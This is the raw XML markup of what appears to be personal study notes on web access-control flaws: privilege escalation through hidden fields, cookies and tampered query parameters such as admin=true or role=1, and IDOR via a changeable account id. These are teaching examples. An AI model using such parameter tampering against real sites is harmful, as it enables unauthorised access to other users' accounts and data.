          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A hidden field. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Check here</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="0" w:after="18"/>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 xml:space="preserve">A cookie. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Check here</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="0" w:after="18"/>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 xml:space="preserve">A preset query string parameter: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Check here</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:widowControl/>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>eg :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:widowControl/>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="0" w:after="75"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">https://insecure-website.com/login/home.jsp?admin=true </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>https://insecure-website.com/login/home.jsp?role=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:widowControl/>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="0" w:after="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Horizontal privilege escalation: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="1A2461"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="1A2461"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Horizontal privilege escalation occurs if a user is able to gain access to resources belonging to another user, instead of their own resources of that type</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>https://insecure-website.com/myaccount?id=123</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:br/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="1A2461"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This is an example of an insecure direct object reference (IDOR) vulnerability. This type of vulnerability arises where user-controller parameter values are used to access resources or functions directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i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ab/>
        <w:t>In some applications, the exploitable parameter does not have a predictable value. For example, instead of an incrementing number, an application might use globally unique identifiers (GUIDs) to identify users. This may prevent an attacker from guessing or predicting another user's identifier. However, the GUIDs belonging to other users might be disclosed elsewhere in the application where users are referenced, such as user messages or reviews.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="1A2461"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="1A2461"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>All the vertical scalation is present , so check if password is revealed somewhere  so that it leads to vertical priviledges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="0" w:after="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="1A2461"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="2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al">
    <w:altName w:val="Courier"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Arial">
    <w:altName w:val="Courier"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Courier">
    <w:altName w:val="Courier New"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>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10">
    <w:name w:val="Heading 10"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>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web-security/cross-site-scripting/exploiting" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insecure-website.com/admin" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://insecure-website.com/robots.tx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LibreOffice/6.4.7.2$Linux_X86_64 LibreOffice_project/40$Build-2</Application>
  <Pages>4</Pages>
  <Words>555</Words>
  <Characters>3052</Characters>
  <CharactersWithSpaces>3572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2024-01-20T15:23:57Z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